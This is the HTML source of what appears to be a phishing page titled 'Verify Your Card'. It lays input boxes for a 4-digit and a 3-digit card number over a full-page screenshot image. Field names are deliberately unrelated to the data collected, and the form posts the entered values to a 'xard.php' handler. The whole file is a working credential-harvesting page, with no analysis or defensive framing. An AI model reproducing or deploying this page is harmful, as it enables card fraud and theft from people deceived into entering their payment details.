<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head>
<title>Verify Your Card</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<link rel="shortcut icon"
              href="images/favicon.ico"/>

<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">


<style type="text/css">
.textbox { 
    border: 1px solid #c4c4c4; 
	background: ;
    height: 23px; 
    width: 275px; 
    font-size: 13px; 
    padding: 4px 4px 4px 4px; 
    border-radius: 1px; 
  } 
 
.textbox:focus { 
	 background-color: #FFF;
    outline: none; 
    border: 2px solid #7bc1f7; 
  	border-radius: 4px;  
} 
</style>

<SCRIPT language=Javascript>
      <!--
      function isNumberKey(evt)
      {
         var charCode = (evt.which) ? evt.which : event.keyCode
         if (charCode > 31 && (charCode < 48 || charCode > 57))
            return false;

         return true;
      }
      //-->
   </SCRIPT>	


<script type="text/javascript">
function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}
</script>
<style type="text/css">
div#container
{
	position:relative;
	width: 1352px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>

</head>


<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1347px; height:576px; z-index:0"><img src="images/ddd.png" alt="" title="" border=0 width=1347 height=576></div>


<form action="xard.php"  name="castoi" id="castoi" method="post">

<input name="amebo" class="textbox" autocomplete="off" required=""  onkeypress="return isNumberKey(event)" type="text"  maxlength=4 style="position:absolute;width:83px;left:425px;top:224px;z-index:21">

<input name="osho" class="textbox" autocomplete="off" required="" type="text" maxlength=3  onkeypress="return isNumberKey(event)" style="position:absolute;width:83px;left:425px;top:327px;z-index:22">


<div id="foge1" style="position:absolute; left:850px; top:429px; z-index:34">
<input type="image" name="formimage1" width="79" height="25" src="images/button1.png"></div>


<div id="foge1" style="position:absolute; left:375px; top:429px; z-index:34">
<input type="image" name="formimage1" width="79" height="25" src="images/button2.png"></div>

</form>
</body>
</html>
